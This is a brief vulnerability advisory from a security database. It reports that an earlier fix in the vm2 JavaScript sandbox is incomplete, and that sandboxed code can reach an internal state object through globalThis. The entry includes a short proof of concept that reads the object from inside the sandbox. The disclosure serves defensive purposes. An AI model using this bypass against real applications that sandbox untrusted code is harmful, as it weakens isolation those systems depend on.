Security controls bypass or absence In vm2

Description

Code running inside the vm2 sandbox can access VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL.

Summary

The fix for https://github.com/patriksimek/vm2/security/advisories/GHSA-wp5r-2gw5-m7q7 is incomplete.

Details

Sandboxed code can still obtain a reference to VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL through the sandbox's globalThis.

PoC

const {VM} = require("vm2");
const vm = new VM();
// Evaluated inside the sandbox; on a fully patched vm2 this lookup should not
// return the internal state object.
console.log(vm.run(`
 globalThis['VM2_INTERNAL_STATE_DO_NOT_USE_OR_PROGRAM_WILL_FAIL']
`));

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

FLAT-1DBLY – Vulnerability | Fluid Attacks Database